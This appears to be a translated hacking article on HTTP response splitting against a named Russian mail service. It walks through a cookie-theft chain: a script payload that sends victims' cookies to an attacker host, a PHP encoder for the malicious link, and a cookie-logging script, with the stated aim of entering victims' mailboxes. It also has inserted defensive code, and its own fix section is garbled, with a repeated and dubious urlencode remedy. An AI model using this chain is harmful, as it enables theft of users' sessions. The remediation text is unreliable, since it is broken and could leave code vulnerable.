
HTTP splitting vulnerability

This article discusses the practical exploitation of the vulnerability known as HTTP splitting (HTTP response splitting).

The buggy header() under the microscope

Wandering around the Internet, we often come across URLs of the form . A simple-minded user clicks on it without a second thought and lands on . An inquisitive user substitutes the address of his home page into the URL and satisfies himself that the script is sloppy.
Besides the simply curious, there are also very curious users on the Internet. They feed the link to AccessDiver and start studying how the script works.

1. The essence of the bug.
2. Practical application.
3. The location of the prevalence of error.
4. Means of protection.

For those who have been living under a rock: AccessDiver is a "hacker" tool, as it is customarily called among the people. It can be downloaded from the project's official site. At the time of writing, the latest version of the utility was 4.173. The program is best known for its HTTP debugger function. To use it, switch to expert mode and select the corresponding item in the Tools menu (F4, then Ctrl+F9; the shortcuts may differ between versions). We will not dwell on configuring it; any schoolboy can handle the Diver.

For the experiments we chose , since it is the best-known mail service in the Russian Internet, and the reader will be particularly interested to learn about a bug on this project ;) Let's follow the link / . We are taken to the finest portal on computer security ;). We add the site to our bookmarks and return to the mail service. Enter the link of interest in the HTTP Address field, set Mode to GET and click Connect.
The HTTP headers returned by the server will appear, approximately as in the screenshot:

Pay attention to the underlined line. When the browser meets a Location: header, it unconditionally takes us to the specified URL. Consequently, we can slip the user a link that looks like it points to the mail service, but he will end up somewhere else entirely. All this is nice, but in practice it does not get us anywhere yet.

Note that the lines of the header are separated by the two characters 0Dh 0Ah. What if we append them to the end of the link? Let's see what the server returns in response to the request :

How interesting. So we can make the server emit almost any header, for example to modify the user's cookies. But, again, this is still not as interesting as what lies ahead. Notably, the headers are separated from the body of the document by the sequence 0Dh 0Ah 0Dh 0Ah. Can we serve an entire arbitrary page? Enter %0D%0A%0D%0A<script>alert(document.cookie);</script><!-- and look:

Everything highlighted in yellow is the body of the document itself. If JavaScript is enabled in the browser, following the link shows a message box with our cookies. To carry out an XSS attack, you need to:
1) Create a page like <script>document.location=''+document.cookie;</script>
2) URL-encode it using a script:

<?php
$url = "";
$s  = "<script>document.location='http://'";
$s .= "+document.cookie;</script>";
$res = "";
// percent-encode every byte of the payload, padding single hex digits with a leading 0
for ($i = 0; $i < strlen($s); $i++) {
    $res .= "%";
    $t = ord($s[$i]);
    if ($t < 16)
        $res .= "0";
    $res .= dechex($t);
}

echo $url . "%0d%0a%0d%0a" . $res;

We get: ... etc. (**)

3) Write a script log.php and upload it to
<?php
$fid = fopen("../log.txt", "a");
fputs($fid, $_SERVER["QUERY_STRING"] . "\r\r\r");
fclose($fid);
header("Location:");

Now we can send the magic link (**) to the victim and obtain his cookies.
They can be used for many useful things, for example to get access to the mailbox, but more about that another time; we have already strayed too far from the main topic.
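Seen from the server side, the steps above leave a trace: a splitting attempt is a request whose decoded parameter contains CR or LF. The script below is an added example and not code from the article; it scans constructed access-log lines for exactly that condition. The host names, the redirect.php path and the log lines are all made up for the demonstration.

```php
<?php
// Added example (not from the original article): flag requests whose decoded
// query parameters contain CR (0x0D) or LF (0x0A), the precondition for
// response splitting through header("Location: $url").

/**
 * Return the names of query parameters whose URL-decoded value contains
 * CR or LF. An empty array means the request looks clean.
 */
function findCrlfParams(string $queryString): array
{
    $suspicious = [];
    foreach (explode('&', $queryString) as $pair) {
        if ($pair === '') {
            continue;
        }
        $parts = explode('=', $pair, 2);
        $name  = rawurldecode($parts[0]);
        $value = rawurldecode($parts[1] ?? '');
        // Decode a second time as well: some stacks decode twice, so
        // %250d%250a becomes %0d%0a and finally CR LF.
        $twice = rawurldecode($value);
        if (preg_match('/[\r\n]/', $value) || preg_match('/[\r\n]/', $twice)) {
            $suspicious[] = $name;
        }
    }
    return $suspicious;
}

/**
 * Scan access-log lines (combined log format) and return those whose
 * request target carries CR/LF in a decoded query parameter.
 */
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Extract the request target from "METHOD /path?query HTTP/x.y"
        if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[1], '?');
        if ($qpos === false) {
            continue;
        }
        $params = findCrlfParams(substr($m[1], $qpos + 1));
        if ($params !== []) {
            $hits[] = ['line' => $line, 'params' => $params];
        }
    }
    return $hits;
}

// Constructed sample log lines (addresses, paths and dates are placeholders).
$sampleLog = [
    '192.0.2.10 - - [10/Sep/2005:12:00:01 +0400] "GET /redirect.php?url=http://example.org/ HTTP/1.1" 302 0',
    '192.0.2.11 - - [10/Sep/2005:12:00:02 +0400] "GET /redirect.php?url=http://example.org/%0d%0aX-Test:%201 HTTP/1.1" 302 0',
    '192.0.2.12 - - [10/Sep/2005:12:00:03 +0400] "GET /redirect.php?url=%250d%250a%250d%250a HTTP/1.1" 302 0',
];

// The first line is clean; the second and third are reported.
foreach (scanAccessLog($sampleLog) as $hit) {
    echo "CRLF in parameter(s) " . implode(', ', $hit['params']) . ": " . $hit['line'] . "\n";
}
```

The same findCrlfParams() check can sit in front of any script that copies a parameter into a header: a non-empty result is a reason to refuse the request and log it, not to strip the characters and carry on.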

Of course, there is no need to bash the mail service as a bad resource; it is hardly the only one. Everyone makes mistakes, though admins make them less and less often. Bugs still remain, however. People keep quiet about them not out of greed but out of fear of an inadequate reaction from the administration to their find, which, statistically, does happen. Fortunately, the presence of XSS does not guarantee access to the mailbox. I am sure the bug will be fixed, within two days at the latest. And it is not the only vulnerable one. I strongly recommend reading: [XSS][XSS]

Frankly, I was very surprised when I learned that such vulnerabilities were written about 3 years ago (see "CRLF injection in the PHP header() function" from September 10, 2002), but since I had never heard of them before, I considered the topic relevant. Besides, blah blah, the presence of such bugs on Yandex, Rambler and Mail can hardly be called irrelevant.

Fixing the error is not difficult. Suppose we have the vulnerable script:

if (!isset($url))
    $url = "";

header("Location: $url");


We make it invulnerable:

header("Location:" . urlencode($url));

If the redirect is only ever meant to stay within the site, it is best to do this:

header("Location:" . urlencode($url));
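For the in-site case, the following added example (not the article's own code) takes a stricter route than encoding: it refuses any target that contains a control character, since CR and LF are what terminate the Location header, and accepts only a relative path beginning with a single slash, falling back to a known page otherwise. The function names and the sample inputs are this example's own.

```php
<?php
// Added example (not from the original article): a redirect helper for
// redirects that must stay within the site. It rejects anything that could
// terminate the Location header and anything that points off-site.

/**
 * Return the in-site target to redirect to, or null when $url is rejected.
 */
function safeLocalTarget(string $url): ?string
{
    // Reject ASCII control characters outright: CR (0x0D) and LF (0x0A) would
    // end the Location header and turn the rest of $url into new headers or a
    // response body. Do not "clean" them out; a rejected value should be logged.
    if (preg_match('/[\x00-\x1F\x7F]/', $url)) {
        return null;
    }
    // Accept only a path starting with a single "/". This excludes absolute
    // URLs (http://...), scheme-relative URLs (//host/...) and "/\host", which
    // some browsers normalise to "//host".
    if (!preg_match('#\A/(?![/\\\\])#', $url)) {
        return null;
    }
    return $url;
}

/**
 * Build the header line the script should send. Falls back to $fallback when
 * the requested target is rejected, so the user never gets a broken redirect.
 */
function buildLocationHeader(string $requested, string $fallback = '/'): string
{
    $target = safeLocalTarget($requested) ?? $fallback;
    return 'Location: ' . $target;
}

// In place of the vulnerable header("Location: $url") the script would do:
//   header(buildLocationHeader($_GET['url'] ?? ''));
//   exit;

// Constructed inputs showing what is accepted and what is refused.
$samples = [
    '/inbox?folder=1',                        // accepted as is
    "/inbox\r\nX-Test: 1\r\n\r\n<html>",      // CR/LF present -> rejected
    'http://example.org/',                    // absolute URL -> rejected
    '//example.org/',                         // scheme-relative -> rejected
    '/\\example.org/',                        // backslash variant -> rejected
];
foreach ($samples as $s) {
    echo str_pad(json_encode($s), 48) . ' => ' . buildLocationHeader($s) . "\n";
}
```

Only the first sample reaches the browser unchanged; every other one is answered with the fallback "Location: /". Recent PHP versions also refuse a header() value containing a newline, but the check belongs in the script rather than being left to the runtime.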

That is probably all we wanted to say. Here are a few more XSS samples: "><h1>XSS</h1> and "<h1>XSS</h1>